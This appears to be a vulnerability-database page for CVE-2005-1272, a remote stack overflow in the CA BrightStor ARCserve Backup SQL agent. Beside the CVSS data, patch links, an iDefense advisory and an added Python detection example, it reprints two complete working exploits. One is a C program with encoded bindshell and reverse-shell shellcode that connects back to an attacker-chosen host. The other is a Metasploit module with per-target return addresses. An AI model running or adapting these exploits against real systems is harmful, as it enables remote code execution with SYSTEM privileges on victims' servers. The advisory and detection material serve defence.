CVE-2005-1272
CVSS 7.5
Published: 2005-08-05 00:00:00
Last revised: 2008-09-05 16:48:42

[Original] Stack-based buffer overflow in the Backup Agent for Microsoft SQL Server in BrightStor ARCserve Backup Agent for SQL Server 11.0 allows remote attackers to execute arbitrary code via a long string sent to port (1) 6070 or (2) 6050.


[CNNVD] CA BrightStor ARCserve Backup Stack Overflow Vulnerability (CNNVD-200508-064)

BrightStor ARCserve Backup provides backup and recovery protection for servers on a range of platforms.
A stack overflow vulnerability exists in BrightStor ARCserve Backup and BrightStor Enterprise Backup Agents for Windows that may allow a remote attacker to execute arbitrary code with SYSTEM privileges or cause a denial of service. The overflow is caused by missing bounds checking on data sent to port 6070.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/a:ca:brightstor_arcserve_backup:11.1::windows
cpe:/a:ca:brightstor_arcserve_backup_agent:11.1::sql
cpe:/a:ca:brightstor_enterprise_backup_agent:10.5::oracle
cpe:/a:ca:brightstor_arcserve_backup_agent:9.0.1::exchange
cpe:/a:ca:brightstor_arcserve_backup_agent:9.0.1::sap
cpe:/a:ca:brightstor_enterprise_backup_agent:10.0::sap
cpe:/a:ca:brightstor_enterprise_backup_agent:10.0::sql
cpe:/a:ca:brightstor_enterprise_backup:10.0  (Computer Associates BrightStor Enterprise Backup 10.0)
cpe:/a:ca:brightstor_arcserve_backup_agent:11.0::sql
cpe:/a:ca:brightstor_enterprise_backup_agent:10.5::sql
cpe:/a:ca:brightstor_enterprise_backup_agent:10.5::sap
cpe:/a:ca:brightstor_arcserve_backup:11.1::oracle
cpe:/a:ca:brightstor_arcserve_backup:9.0_1::oracle
cpe:/a:ca:brightstor_enterprise_backup:10.5  (Computer Associates BrightStor Enterprise Backup 10.5)
cpe:/a:ca:brightstor_arcserve_backup_agent:9.0.1::sql
cpe:/a:ca:brightstor_arcserve_backup:9.0.1::windows
cpe:/a:ca:brightstor_arcserve_backup_agent:11.0::sap
cpe:/a:ca:brightstor_arcserve_backup:11.0::windows
cpe:/a:ca:brightstor_enterprise_backup_agent:10.0::oracle
cpe:/a:ca:brightstor_arcserve_backup_agent:11.1::exchange
cpe:/a:ca:brightstor_arcserve_backup:11.0::oracle
cpe:/a:ca:brightstor_arcserve_backup_agent:11.1::sap
cpe:/a:ca:brightstor_arcserve_backup_agent:11::exchange

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1272
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1272
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-064
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/279774
(VENDOR_ADVISORY)  CERT-VN  VU#279774
http://xforce.iss.net/xforce/xfdb/21656
(PATCH)  XF  brightstor-enterprise-backup-bo(21656)
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239
(PATCH)  CONFIRM  http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239
http://www.securityfocus.com/bid/14453
(PATCH)  BID  14453
http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities&flashstatus=true
(UNKNOWN)  IDEFENSE  20050803 CA BrightStor ARCserve Backup Agent for MS SQL Server Buffer Overflow

- Vulnerability information

CA BrightStor ARCserve Backup Stack Overflow Vulnerability
High risk  Buffer overflow
Published: 2005-08-05 00:00:00  Updated: 2005-10-20 00:00:00
Remote
BrightStor ARCserve Backup provides backup and recovery protection for servers on a range of platforms.
A stack overflow vulnerability exists in BrightStor ARCserve Backup and BrightStor Enterprise Backup Agents for Windows that may allow a remote attacker to execute arbitrary code with SYSTEM privileges or cause a denial of service. The overflow is caused by missing bounds checking on data sent to port 6070.

- Advisories and patches

The vendor has released patches that fix this issue; download links:
BrightStor ARCserve Backup r11.1 for Windows:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70767&startsearch=1
BrightStor ARCserve Backup r11.0 for Windows:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70769&startsearch=1
BrightStor ARCserve Backup v9.01 for Windows:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70770&startsearch=1
BrightStor Enterprise Backup v10.5 for Windows:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70774&startsearch=1
BrightStor Enterprise Backup v10.0 for Windows:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70773&startsearch=1

- Vulnerability information (1130)

CA BrightStor ARCserve Backup Agent (dbasqlr.exe) Remote Exploit (EDBID:1130)
Platform: windows  Type: remote
Date: 2005-08-03  Verified
Port: 6070  Author: cybertronic
/*
 * CA BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe
 *
 * cybertronic[at]gmx[dot]net
 *
 */

#include <stdio.h>
#include <stdlib.h>      /* exit, atoi */
#include <string.h>      /* memset, memcpy, strlen */
#include <strings.h>     /* bzero */
#include <unistd.h>      /* write, close */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr */
#include <netdb.h>

#define PORT 6070

unsigned char bindshell[] =
"\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32"
"\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
"\x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a"
"\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d"
"\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc"
"\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90"
"\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b"
"\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2"
"\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81\xbf\x32\x1d\xc6\xa7\xcd\xe2"
"\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80\xbf\x32\x1d\xc6\xa3\xcd\xe2"
"\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80\xbf\x32\x1d\xc6\x9f\xcd\xe2"
"\x84\xd7\x96\x39\xae\x56\xda\x4a\x80\xbf\x32\x1d\xc6\x9b\xcd\xe2"
"\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80\xbf\x32\x1d\xc6\x97\xcd\xe2"
"\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80\xbf\x32\x1d\xc6\x93\x01\x6b"
"\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81\xbe\x32\x94\x7f\xe9\x2a\xc4"
"\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6\xa3\xb9\x4c\xd7\xe8\x5a\x96"
"\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3\x40\x64\xb4\xd7\xec\xcd\xc2"
"\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50\xd7\x57\xec\xe5\xbf\x5a\xf7"
"\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4\x32\x0e\xb0\xb3\x7f\x01\x5d"
"\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4\xaf\x76\x6a\xc4\x9b\x0f\x1d"
"\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4\x9b\x62\x19\xc4\x9b\x22\xc0"
"\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f\xc9\x02\xc5\x7f\xe9\x22\x1f"
"\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b\x77\x65\x6b\xd6\x93\xcd\xc2"
"\x94\xea\x64\xf0\x21\x8f\x32\x94\x80\x3a\xf2\xec\x8c\x34\x72\x98"
"\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89\x34\x72\xa0\x0b\x17\x8a\x94"
"\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80\xec\x67\xc2\xd7\x34\x5e\xb0"
"\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83\x6a\xb9\xde\x98\x34\x68\xb4"
"\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83\x4a\x01\x6b\x7c\x8c\xf2\x38"
"\xba\x7b\x46\x93\x41\x70\x3f\x97\x78\x54\xc0\xaf\xfc\x9b\x26\xe1"
"\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c\xf4\xb9\xce\x9c\xbc\xef\x1f"
"\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b\x6a\x6d\xca\xdd\xe4\xf0\x90"
"\x80\x2f\xa2\x04";

unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";

void
exploit ( int s, unsigned long cbip, unsigned short cbport, int option )
{
	unsigned long pushesp = 0x20c0c1ab;
	char buffer[3289];

	bzero ( &buffer, sizeof ( buffer ) );
	memset ( buffer, 0x41, sizeof ( buffer ) - 1 );
	memcpy ( buffer + 1337, "\x81\xc4\x54\xf2\xff\xff", 6 );
	memcpy ( buffer + 3168, ( unsigned char* ) &pushesp, 4 );
	memcpy ( buffer + 3172, "\xe9\xd0\xf8\xff\xff", 5 );

	if ( option == 0 )
	{
		memcpy ( &reverseshell[111], &cbip, 4);
		memcpy ( &reverseshell[118], &cbport, 2);
		memcpy ( buffer + 1343, reverseshell, sizeof ( reverseshell ) - 1 );
	}
	else
		memcpy ( buffer + 1343, bindshell, sizeof ( bindshell ) - 1 );

	printf ( "attacking with %zu bytes...", strlen ( buffer ) );
	write ( s, buffer, strlen ( buffer ) );
	printf ( "done!\n" );
	close ( s );
}

int
main ( int argc, char* argv[] )
{
	int s;
	unsigned long cbip;
	unsigned short cbport;
	struct sockaddr_in remote_addr;
	struct hostent* host_addr;

	if ( argc != 2 )
		if ( argc != 4 )
			{ fprintf ( stderr, "Usage\n-----\n[bindshell] %s <ip>\n[reverseshell] %s <ip> <cbip> <cbport>\n", argv[0], argv[0] ); exit ( 1 ); }

	if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
		{ fprintf ( stderr, "Cannot resolve hostname: %s\n", argv[1] ); exit ( 1 ); }

	remote_addr.sin_family = AF_INET;
	remote_addr.sin_addr   = * ( ( struct in_addr * ) host_addr->h_addr );
	remote_addr.sin_port   = htons ( PORT );

	s = socket ( AF_INET, SOCK_STREAM, 0 );
	printf ( "connecting to %s:%d...", argv[1], PORT );
	if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
		{ printf ( "failed!\n" ); exit ( 1 ); }
	printf ( "ok!\n" );

	if ( argc == 4 )
	{
		cbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
		cbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
		exploit ( s, cbip, cbport, 0 );
	}
	else
		exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 );
}

// milw0rm.com [2005-08-03]

- Vulnerability information (16403)

CA BrightStor Agent for Microsoft SQL Overflow (EDBID:16403)
Platform: windows  Type: remote
Date: 2010-04-30  Verified
Port: 0  Author: metasploit
##
# $Id: sql_agent.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA BrightStor Agent for Microsoft SQL Overflow',
			'Description'    => %q{
					This module exploits a vulnerability in the CA BrightStor
				Agent for Microsoft SQL Server. This vulnerability was
				discovered by cybertronic[at]gmx.net.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2005-1272'],
					[ 'OSVDB', '18501' ],
					[ 'BID', '14453'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities'],
					[ 'URL', 'http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					# This exploit requires a jmp esp for return
					['ARCServe 11.0 Asbrdcst.dll 12/12/2003',     { 'Platform' => 'win', 'Ret' => 0x20c11d64 }], # jmp esp
					['ARCServe 11.1 Asbrdcst.dll 07/21/2004',     { 'Platform' => 'win', 'Ret' => 0x20c0cd5b }], # push esp, ret
					['ARCServe 11.1 SP1 Asbrdcst.dll 01/14/2005', { 'Platform' => 'win', 'Ret' => 0x20c0cd1b }], # push esp, ret

					# Generic jmp esp's
					['Windows 2000 SP0-SP3 English',              { 'Platform' => 'win', 'Ret' => 0x7754a3ab }], # jmp esp
					['Windows 2000 SP4 English',                  { 'Platform' => 'win', 'Ret' => 0x7517f163 }], # jmp esp
					['Windows XP SP0-SP1 English',                { 'Platform' => 'win', 'Ret' => 0x71ab1d54 }], # push esp, ret
					['Windows XP SP2 English',                    { 'Platform' => 'win', 'Ret' => 0x71ab9372 }], # push esp, ret
					['Windows 2003 SP0 English',                  { 'Platform' => 'win', 'Ret' => 0x71c03c4d }], # push esp, ret
					['Windows 2003 SP1 English',                  { 'Platform' => 'win', 'Ret' => 0x71c033a0 }], # push esp, ret
				],
			'DisclosureDate' => 'Aug 02 2005',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(6070)
			], self.class)
	end


	def exploit

		print_status("Trying target #{target.name}...")

		# The 'one line' request does not work against Windows 2003
		1.upto(5) { |i|

			# Flush some memory
			connect
			begin
				sock.put("\xff" * 0x12000)
				sock.get_once
			rescue
			end
			disconnect


			# 3288 bytes max
			#  696 == good data (1228 bytes contiguous) @ 0293f5e0
			# 3168 == return address
			# 3172 == esp @ 0293ff8c (2476 from good data)

			buf = rand_text_english(3288, payload_badchars)
			buf[ 696, payload.encoded.length ] = payload.encoded
			buf[3168, 4] = [target.ret].pack('V')  # jmp esp
			buf[3172, 5] = "\xe9\x4f\xf6\xff\xff"  # jmp -2476

			connect
			begin
				sock.put(buf)
				sock.get_once
			rescue
			end

			handler
			disconnect
		}
	end

end

- Vulnerability information (F83109)

CA BrightStor Agent for Microsoft SQL Overflow (PacketStormID:F83109)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit
CVE-2005-1272

This Metasploit module exploits a vulnerability in the CA BrightStor Agent for Microsoft SQL Server. This vulnerability was discovered by cybertronic@gmx.net.


- Vulnerability information (F39049)

iDEFENSE Security Advisory 2005-08-02.t (PacketStormID:F39049)
2005-08-05 00:00:00
iDefense Labs  idefense.com
advisory,remote,overflow,arbitrary
CVE-2005-1272

iDEFENSE Security Advisory 08.02.05 - Remote exploitation of a buffer overflow in the Backup Agent for Microsoft SQL Server within Computer Associates' BrightStor ARCserve Backup Agent for SQL allows an attacker to execute arbitrary code with SYSTEM privileges.

CA BrightStor ARCserve Backup Agent for MS SQL Server Buffer Overflow

iDEFENSE Security Advisory 08.02.05
www.idefense.com/application/poi/display?id=287&type=vulnerabilities
August 2, 2005

I. BACKGROUND

BrightStor ARCserve Backup for Windows delivers backup and restore
protection for all Windows server systems as well as Windows, Linux,
Mac OS X and UNIX client environments.

http://www3.ca.com/Solutions/ProductFamily.asp?ID=115

II. DESCRIPTION

Remote exploitation of a buffer overflow in the Backup Agent for
Microsoft SQL Server within Computer Associates' BrightStor ARCserve 
Backup Agent for SQL allows an attacker to execute arbitrary code with
SYSTEM privileges.

BrightStor ARCserve Backup Agent for Microsoft SQL Server is a component
of the BrightStor ARCserve Backup system for handling backups of 
Microsoft SQL server data. When a string with a length over 3168 bytes,
is sent to the listening port, 6070 by default, a stack based buffer 
overflow occurs.

III. ANALYSIS

Successful exploitation allows remote attackers to execute arbitrary
code with SYSTEM level privileges. This allows for complete system
compromise including the installation or removal of software and access
to any file on the system.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in Computer
Associates BrightStor ARCserve Backup Agent for Microsoft SQL Server
version 11.0. It is suspected that all versions are vulnerable.

V. WORKAROUND

Restrict remote access at the network boundary, unless remote parties
require service. Access to the affected host should be filtered at the 
network boundary if global accessibility is not required. Restricting 
access to only trusted hosts and networks may reduce the likelihood of 
exploitation.

VI. VENDOR RESPONSE

A vendor advisory for this vulnerability can be found at:

   http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-1272 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

04/25/2005  Initial vendor notification
04/25/2005  Initial vendor response
08/02/2005  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
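The advisory's DESCRIPTION section gives a defender two concrete signals: the agent listener (port 6070 by default; the CVE text also names 6050) and the 3168-byte length past which the request overwrites the stack. Both exploits on this page add a third: the Metasploit module sends a 0x12000-byte run of 0xff ("flush some memory") before each attempt, and retries up to five times. The following Python is an added example, not code from iDefense, cybertronic or the Metasploit project; it flags those patterns over reassembled client-to-server payloads. The Segment type, the SAMPLES traffic and the 10.0.0.x addresses are constructed for the example; the thresholds are the ones quoted above.

```python
# Added detection example for the patterns this page documents (not from the
# advisory or either exploit). Inputs are reassembled client->server TCP
# payloads; the Segment records below are constructed, not captured traffic.
from collections import Counter
from dataclasses import dataclass

AGENT_PORTS = {6070, 6050}      # listeners named in the CVE description
OVERFLOW_THRESHOLD = 3168       # iDefense: overflow when the string is over 3168 bytes
FLUSH_LEN = 0x12000             # Metasploit pre-request: sock.put("\xff" * 0x12000)
FLUSH_PATTERN = b"\xff" * FLUSH_LEN


@dataclass(frozen=True)
class Segment:
    """One reassembled client-to-server payload (constructed for this example)."""
    src: str
    dport: int
    payload: bytes


def classify(seg):
    """Return a verdict string for one segment, or None when nothing stands out."""
    if seg.dport not in AGENT_PORTS:
        return None
    if seg.payload == FLUSH_PATTERN:
        return "flush-pattern"          # the exploit's 'flush some memory' pre-request
    if len(seg.payload) > OVERFLOW_THRESHOLD:
        return "oversized-request"      # long enough to reach the saved return address
    return None


def scan(segments):
    """Return (src, dport, verdict) for every suspicious segment, in arrival order."""
    hits = []
    for seg in segments:
        verdict = classify(seg)
        if verdict is not None:
            hits.append((seg.src, seg.dport, verdict))
    return hits


def repeat_offenders(segments, min_hits=2):
    """Sources with at least min_hits alerts; the Metasploit module retries five times."""
    counts = Counter(src for src, _, _ in scan(segments))
    return sorted(src for src, n in counts.items() if n >= min_hits)


# Constructed sample traffic: a benign agent request, an exploit-style session
# (flush followed by a 3288-byte buffer, the size both exploits on this page use),
# a request exactly at the threshold, and an oversized request to an unrelated port.
SAMPLES = [
    Segment("10.0.0.5", 6070, b"A" * 200),
    Segment("10.0.0.9", 6070, FLUSH_PATTERN),
    Segment("10.0.0.9", 6070, b"A" * 3288),
    Segment("10.0.0.7", 6050, b"A" * 3168),     # at the threshold, not over it
    Segment("10.0.0.7", 8080, b"A" * 5000),     # wrong port: must not alert
]

if __name__ == "__main__":
    for hit in scan(SAMPLES):
        print("ALERT src=%s dport=%d %s" % hit)
    print("repeat offenders:", repeat_offenders(SAMPLES))
```

The length check uses "over 3168 bytes" exactly as section II states it; a request of 3168 bytes or fewer does not reach the saved return address, so it is not flagged. This complements the WORKAROUND above rather than replacing it: boundary filtering is the control, and this logic alerts on attempts that reach a host where the agent port is still exposed.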

- Vulnerability information

OSVDB ID: 18501
CA BrightStor ARCserve Backup Agent for Windows Long String Overflow
Location: Remote / Network Access  Attack Type: Input Manipulation
Impact: Loss of Confidentiality, Loss of Integrity  Solution: Patch / RCS
Exploit: Exploit Public, Exploit Commercial  Disclosure: Vendor Verified

- Vulnerability description

A remote stack-based buffer overflow exists in Brightstor Arcserve. The agent software fails to validate user-supplied input resulting in a long string overflow. With a specially crafted request of 3168 bytes to port 6070, an attacker can execute arbitrary code with System privilege resulting in a loss of confidentiality and integrity.

- Timeline

2005-08-02 2005-04-25
2005-08-05 2005-09-02

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Computer Associates has released patches to address this vulnerability: For ARCserve 11.1 apply fix QO70767. For ARCserve 11 apply fix QO70769. For ARCserve 9.01 apply fix QO70770. For Enterprise 10.5 apply fix QO70774. For Enterprise 10 apply fix QO70773.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Computer Associates BrightStor ARCserve Backup Remote Buffer Overflow Vulnerability
Class: Boundary Condition Error  Bugtraq ID: 14453
Remote: Yes  Local: No
Published: 2005-08-02 12:00:00  Updated: 2007-11-15 12:40:00
An anonymous researcher discovered this issue.

- Affected program versions

Computer Associates BrightStor Enterprise Backup Serverless Backup 10.5
Computer Associates BrightStor Enterprise Backup Serverless Backup 10.0
Computer Associates BrightStor Enterprise Backup for Windows 64 bit 10.5
Computer Associates BrightStor Enterprise Backup Agent for SQL 10.5
Computer Associates BrightStor Enterprise Backup Agent for SQL 10.0
Computer Associates BrightStor Enterprise Backup Agent for SAP R/3 10.5
Computer Associates BrightStor Enterprise Backup Agent for SAP R/3 10.0
Computer Associates BrightStor Enterprise Backup Agent for Oracle 10.5
Computer Associates BrightStor Enterprise Backup Agent for Oracle 10.0
Computer Associates BrightStor Enterprise Backup 10.5
Computer Associates BrightStor Enterprise Backup 10.0
Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.1
Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.0
Computer Associates BrightStor ARCServe Backup for Windows 64 bit 9.0.1
Computer Associates BrightStor ARCserve Backup for Windows (NoEng-Cli) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (NoEng-All) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (Eng-Cli) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (Eng-All) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (Client) 11.1
Computer Associates BrightStor ARCserve Backup for Windows (All) 11.1
Computer Associates BrightStor ARCServe Backup for Windows 11.1
Computer Associates BrightStor ARCServe Backup for Windows 11.0
Computer Associates BrightStor ARCServe Backup for Windows 9.0 .0.1
Computer Associates BrightStor ARCserve Backup for Oracle 11.1
Computer Associates BrightStor ARCserve Backup for Oracle 11.0
Computer Associates BrightStor ARCserve Backup for Oracle 9.0 1
Computer Associates BrightStor ARCserve Backup Agent for SQL 11.1
Computer Associates BrightStor ARCserve Backup Agent for SQL 11.0
Computer Associates BrightStor ARCserve Backup Agent for SQL 9.0 .0.1
Computer Associates BrightStor ARCserve Backup Agent for SAP R/3 11.1
Computer Associates BrightStor ARCserve Backup Agent for SAP R/3 11.0
Computer Associates BrightStor ARCserve Backup Agent for SAP R/3 9.0 1
Computer Associates BrightStor ARCserve Backup Agent for Exchange 11.1
Computer Associates BrightStor ARCserve Backup Agent for Exchange 11.0
Computer Associates BrightStor ARCserve Backup Agent for Exchange 9.0 1

- Vulnerability discussion

Computer Associates BrightStor ARCserve Backup and BrightStor Enterprise Backup Agents for Windows are affected by a remote stack-based buffer-overflow vulnerability because the application fails to perform proper bounds checking on data supplied to the application.

A remote attacker may exploit this issue to execute arbitrary code on a vulnerable computer with SYSTEM privileges. A denial-of-service condition may arise as well.

- Exploit

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

cybertronic@gmx.net has provided exploit code CABrightStorSQL.c.

cybertronic@gmx.net has also provided exploit code CABrightStorSQL_exp.c.

Exploit code cabrightstor_sqlagent.pm has been released as part of the Metasploit Framework.

- Solution

The vendor has released updates addressing this issue.

The vendor has reported that the patch for BrightStor ARCserve Backup r11.1 Agent for SQL for Windows (QO70767) did not fully address this issue. A new patch for BrightStor ARCserve Backup for Windows (QO71010) is available. Users are advised to apply the new patch immediately.


Computer Associates BrightStor ARCserve Backup for Windows (Eng-All) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (Eng-Cli) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (Client) 11.1
Computer Associates BrightStor ARCserve Backup for Windows (NoEng-All) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (NoEng-Cli) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (All) 11.1
Computer Associates BrightStor Enterprise Backup Agent for SQL 10.0
Computer Associates BrightStor Enterprise Backup 10.0
Computer Associates BrightStor Enterprise Backup Serverless Backup 10.0
Computer Associates BrightStor Enterprise Backup Agent for Oracle 10.0
Computer Associates BrightStor Enterprise Backup Agent for SAP R/3 10.0
Computer Associates BrightStor Enterprise Backup Serverless Backup 10.5
Computer Associates BrightStor Enterprise Backup Agent for SQL 10.5
Computer Associates BrightStor Enterprise Backup Agent for SAP R/3 10.5
Computer Associates BrightStor Enterprise Backup 10.5
Computer Associates BrightStor Enterprise Backup for Windows 64 bit 10.5
Computer Associates BrightStor Enterprise Backup Agent for Oracle 10.5
Computer Associates BrightStor ARCserve Backup Agent for SAP R/3 11.0
Computer Associates BrightStor ARCserve Backup Agent for SQL 11.0
Computer Associates BrightStor ARCserve Backup Agent for Exchange 11.0
Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.0
Computer Associates BrightStor ARCServe Backup for Windows 11.0
Computer Associates BrightStor ARCserve Backup for Oracle 11.0
Computer Associates BrightStor ARCserve Backup Agent for Exchange 11.1
Computer Associates BrightStor ARCserve Backup Agent for SAP R/3 11.1
Computer Associates BrightStor ARCserve Backup Agent for SQL 11.1
Computer Associates BrightStor ARCserve Backup for Oracle 11.1
Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.1
Computer Associates BrightStor ARCServe Backup for Windows 11.1
Computer Associates BrightStor ARCServe Backup for Windows 9.0 .0.1
Computer Associates BrightStor ARCserve Backup Agent for SAP R/3 9.0 1
Computer Associates BrightStor ARCserve Backup Agent for Exchange 9.0 1
Computer Associates BrightStor ARCserve Backup Agent for SQL 9.0 .0.1
Computer Associates BrightStor ARCserve Backup for Oracle 9.0 1
